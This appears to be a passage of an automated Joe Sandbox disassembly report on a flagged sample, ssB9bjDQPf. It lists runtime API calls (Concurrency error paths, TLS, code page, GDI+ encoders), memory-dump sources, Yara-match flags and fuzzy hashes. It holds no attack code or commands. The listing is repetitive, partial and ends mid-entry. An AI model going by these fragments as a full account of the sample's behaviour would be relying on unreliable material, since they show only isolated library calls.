                                                    Similarity
                                                    • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                    • String ID:
                                                    • API String ID: 1674182817-0
                                                    • Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                    • Instruction ID: 4f5043be301f020a87894878a43913a51c3f7b1e9493329acf7807e64a758140
                                                    • Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                    • Instruction Fuzzy Hash: 69F0E2B1A002253AE724B6765D07FFB369C9B00B54F50091BB905E60C2EDDCE58042AC
                                                    APIs
                                                    • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 0250378C
                                                      • Part of subcall function 02502B16: ___crtGetTimeFormatEx.LIBCMT ref: 02502B2C
                                                      • Part of subcall function 02502B16: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 02502B4B
                                                    • GetLastError.KERNEL32 ref: 025037A8
                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 025037BE
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 025037CC
                                                      • Part of subcall function 025028EC: SetThreadPriority.KERNEL32(?,?), ref: 025028F8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                    • String ID:
                                                    • API String ID: 1674182817-0
                                                    • Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                    • Instruction ID: fb76c09d004dba6f175d226a769e9471a667ffb0cc4a69bce33fcdb6aa01ab0f
                                                    • Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                    • Instruction Fuzzy Hash: 14F0AEB154031639E720B7759C49FBB369CAF41751F500866B905E60C1EA94D40445BD
                                                    APIs
                                                    • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 02501342
                                                      • Part of subcall function 02500BB4: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 02500BD6
                                                      • Part of subcall function 02500BB4: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 02500BF7
                                                    • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 02501355
                                                    • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 02501361
                                                    • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 0250136A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                    • String ID:
                                                    • API String ID: 4284812201-0
                                                    • Opcode ID: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
                                                    • Instruction ID: 76ceceaa544bd4081e53b214760b4e1c0f38c56683852b074f13e6808516419a
                                                    • Opcode Fuzzy Hash: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
                                                    • Instruction Fuzzy Hash: 39F02431200B06A7CF047AB48C91ABD35977FC1324B08812A9512AF3C0DF709D019AAD
                                                    APIs
                                                    • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0250D088
                                                    • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0250D0AC
                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0250D0BF
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0250D0CD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                    • String ID:
                                                    • API String ID: 3657713681-0
                                                    • Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                    • Instruction ID: 82892a7dc33eed3ffefba7b1cda33367a7c07f24db01a394ee8bfb9454b23ed6
                                                    • Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                    • Instruction Fuzzy Hash: E4F05931901205A3C324FB94DCE1C7EB77AFFD0B24360892AD809131C1EB71A90ACA59
                                                    APIs
                                                    • RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 00412608
                                                    • GetLastError.KERNEL32(?,?,?,?,004185C9,?,?,?,?,00000000,?,00000000), ref: 00412617
                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041262D
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0041263B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                    • String ID:
                                                    • API String ID: 3803302727-0
                                                    APIs
                                                    • std::_Cnd_initX.LIBCPMT ref: 024F5A83
                                                    • __Cnd_signal.LIBCPMT ref: 024F5A8F
                                                    • std::_Cnd_initX.LIBCPMT ref: 024F5AA4
                                                    • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 024F5AAB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                    • String ID:
                                                    • API String ID: 2059591211-0
                                                    APIs
                                                    • RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 0250286F
                                                    • GetLastError.KERNEL32(?,?,?,?,02508830,?,?,?,?,00000000,?,00000000), ref: 0250287E
                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02502894
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 025028A2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                    • String ID:
                                                    • API String ID: 3803302727-0
                                                    APIs
                                                    • ___crtCreateEventExW.LIBCPMT ref: 0041232C
                                                    • GetLastError.KERNEL32(?,?,?,?,?,00410B39), ref: 0041233A
                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412350
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0041235E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                    • String ID:
                                                    • API String ID: 200240550-0
                                                    APIs
                                                    • ___crtCreateEventExW.LIBCPMT ref: 02502593
                                                    • GetLastError.KERNEL32(?,?,?,?,?,02500DA0), ref: 025025A1
                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 025025B7
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 025025C5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                    • String ID:
                                                    • API String ID: 200240550-0
                                                    APIs
                                                      • Part of subcall function 004126F2: TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8
                                                    • TlsAlloc.KERNEL32(?,00410B39), ref: 0042397F
                                                    • GetLastError.KERNEL32 ref: 00423991
                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004239A7
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004239B5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                    • String ID:
                                                    • API String ID: 3735082963-0
                                                    APIs
                                                      • Part of subcall function 02502959: TlsAlloc.KERNEL32(?,02500DA0), ref: 0250295F
                                                    • TlsAlloc.KERNEL32(?,02500DA0), ref: 02513BE6
                                                    • GetLastError.KERNEL32 ref: 02513BF8
                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02513C0E
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 02513C1C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                    • String ID:
                                                    • API String ID: 3735082963-0
                                                    APIs
                                                    • GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B39), ref: 00412537
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B39), ref: 00412546
                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041255C
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0041256A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                    • String ID:
                                                    • API String ID: 3016159387-0
                                                    APIs
                                                    • GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,02500DA0), ref: 0250279E
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,02500DA0), ref: 025027AD
                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 025027C3
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 025027D1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                    • String ID:
                                                    • API String ID: 3016159387-0
                                                    APIs
                                                    • SetThreadPriority.KERNEL32(?,?), ref: 00412691
                                                    • GetLastError.KERNEL32 ref: 0041269D
                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004126B3
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004126C1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                    • String ID:
                                                    • API String ID: 4286982218-0
                                                    APIs
                                                    • TlsSetValue.KERNEL32(?,00000000,00417971,00000000,?,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412757
                                                    • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00412763
                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412779
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00412787
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                    • String ID:
                                                    • API String ID: 1964976909-0
                                                    APIs
                                                    • SetThreadPriority.KERNEL32(?,?), ref: 025028F8
                                                    • GetLastError.KERNEL32 ref: 02502904
                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0250291A
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 02502928
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                    • String ID:
                                                    • API String ID: 4286982218-0
                                                    APIs
                                                    • TlsSetValue.KERNEL32(?,00000000,02507BD8,00000000,?,?,02500DA0,?,?,?,00000000,?,00000000), ref: 025029BE
                                                    • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 025029CA
                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 025029E0
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 025029EE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                    • String ID:
                                                    • API String ID: 1964976909-0
                                                    APIs
                                                    • TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8
                                                    • GetLastError.KERNEL32 ref: 00412705
                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041271B
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00412729
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                    • String ID:
                                                    • API String ID: 3103352999-0
                                                    APIs
                                                    • TlsAlloc.KERNEL32(?,02500DA0), ref: 0250295F
                                                    • GetLastError.KERNEL32 ref: 0250296C
                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02502982
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 02502990
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                    • String ID:
                                                    • API String ID: 3103352999-0
                                                    APIs
                                                    • __startOneArgErrorHandling.LIBCMT ref: 0042F10D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ErrorHandling__start
                                                    • String ID: pow
                                                    • API String ID: 3213639722-2276729525
                                                    APIs
                                                    • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043B0C4,?,00000050,?,?,?,?,?), ref: 0043AF44
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ACP$OCP
                                                    • API String ID: 0-711371036
                                                    • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                    • Instruction ID: 14488b359d73a2b35151aaad325e7c1d9f20b01c06d3923b8e2598dc1437a59e
                                                    • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                    • Instruction Fuzzy Hash: F3212BA2AC4101A6DB30CB54C907B977366EF5CB11F569526E98AC7300F73ADD11C39E
                                                    APIs
                                                    • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0252B32B,?,00000050,?,?,?,?,?), ref: 0252B1AB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ACP$OCP
                                                    • API String ID: 0-711371036
                                                    • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                    • Instruction ID: e5dcb0415338bbab4bd7542dbd8820032d7c170eee06e78cecdb31c58a8ec2ab
                                                    • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                    • Instruction Fuzzy Hash: FD21B662A10135A6EB348F64CD01BA777AAFF86B5CF468424E909D72C4F732D948C398
                                                    APIs
                                                    • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00401F25
                                                    • GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00401F4A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: EncodersGdipImage$Size
                                                    • String ID: image/png
                                                    • API String ID: 864223233-2966254431
                                                    • Opcode ID: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
                                                    • Instruction ID: a861e299a60b9ced5094bb1731eec5177a5b987cbaa8a1425c649574426e8627
                                                    • Opcode Fuzzy Hash: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
                                                    • Instruction Fuzzy Hash: 04119476D00109FFCB01AFA99C8149EBB76FE41321B60027BE810B21E0C7755F419A58
                                                    APIs
                                                    • SetLastError.KERNEL32(0000000D,?,0040DE41,0040C659,?,?,00000000,?,0040C529,0045D5E4,0040C4F6,0045D5DC,?,ios_base::failbit set,0040C659), ref: 0040EFAA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast
                                                    • String ID: F(@
                                                    • API String ID: 1452528299-2698495834
                                                    • Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                    • Instruction ID: 02fe8a739a07683bc60ca74788e4bb9a0325118a5e4d2b20450d6bc28493fa7e
                                                    • Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                    • Instruction Fuzzy Hash: 2B11C236300216BFCF165F66DD4496AB765BB08B11B11483AFA05A6290CA7498219BD9
                                                    APIs
                                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 0040C554
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ___std_exception_destroy
                                                    • String ID: F(@$ios_base::failbit set
                                                    • API String ID: 4194217158-1828034088
                                                    • Opcode ID: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
                                                    • Instruction ID: 4ba2cac2fce41df0eb0aef52a6a00c17a8a4a8275336f9ee0f9be7dda5d805c6
                                                    • Opcode Fuzzy Hash: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
                                                    • Instruction Fuzzy Hash: 27F0B472A0022836D2302B56BC02B97F7CC8F50B69F14443FFE05A6681EBF8A94581EC
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: H_prolog3_catch
                                                    • String ID: MOC$RCC
                                                    • API String ID: 3886170330-2084237596
                                                    • Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                    • Instruction ID: e9e4e095770ca636dcca3efe7f5224ff47edcbfbbe98bab9d98b6a8866433d4c
                                                    • Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                    • Instruction Fuzzy Hash: 81F0AF70600224CFDB22AF95D40159D3B60AF82748F8281A7F9009B262C73C6E14CFAE
                                                    APIs
                                                    • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404E3C
                                                      • Part of subcall function 0040BF5D: std::_Lockit::_Lockit.LIBCPMT ref: 0040BF71
                                                      • Part of subcall function 0040BF5D: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040BFAE
                                                    • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404E50
                                                      • Part of subcall function 0040C008: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040C02F
                                                      • Part of subcall function 0040C008: std::_Lockit::~_Lockit.LIBCPMT ref: 0040C0A0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: std::_$Locinfo::_$LocinfoLockit$Locinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                    • String ID: F@
                                                    • API String ID: 2118720939-885931407
                                                    • Opcode ID: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
                                                    • Instruction ID: 13870e84e441ff14f0459789a428ac9660f365acd1e629d5c6e8dadf1a096d8e
                                                    • Opcode Fuzzy Hash: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
                                                    • Instruction Fuzzy Hash: 7CF034B2410205DAEB21AF50C412B9973B4BF80B15F61813FE545AB2C1DB786949CB89
                                                    APIs
                                                    • std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 00428D83
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00428DAA
                                                      • Part of subcall function 0042860D: RaiseException.KERNEL32(?,?,0040D87E,00000000,00000000,00000000,00000000,?,?,?,?,0040D87E,00000000,0045617C,00000000), ref: 0042866D
                                                    Strings
                                                    • Access violation - no RTTI data!, xrefs: 00428D7A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ExceptionException@8RaiseThrowstd::__non_rtti_object::__construct_from_string_literal
                                                    • String ID: Access violation - no RTTI data!
                                                    • API String ID: 2053020834-2158758863
                                                    • Opcode ID: f465db51e5b26baf5defdc7598b1b5016ca783533df98e5f879df06e94262f84
                                                    • Instruction ID: 6523df8e39b2e501409064d37ec9e65ca05e1b8799177bf407a1bfc54a05c872
                                                    • Opcode Fuzzy Hash: f465db51e5b26baf5defdc7598b1b5016ca783533df98e5f879df06e94262f84
                                                    • Instruction Fuzzy Hash: 28E0DF726993185A9A04D6A1B846CDE73EC9E24300BA0001FF900920C2EE2DF918826D
                                                    APIs
                                                    • Concurrency::details::InternalContextBase::~InternalContextBase.LIBCONCRT ref: 0042382E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ContextInternal$BaseBase::~Concurrency::details::
                                                    • String ID: zB$~B
                                                    • API String ID: 3275300208-395995950
                                                    • Opcode ID: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
                                                    • Instruction ID: f55228a66ce0378ecda15d2e29e2cf9b619ecd1f8f2314d3bfe00ef4b4db5243
                                                    • Opcode Fuzzy Hash: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
                                                    • Instruction Fuzzy Hash: 83D05B7124C32525E2256A4974057857AD84B01764F50803FF94456682CBB9654442DC
                                                    APIs
                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004212DB
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004212E9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
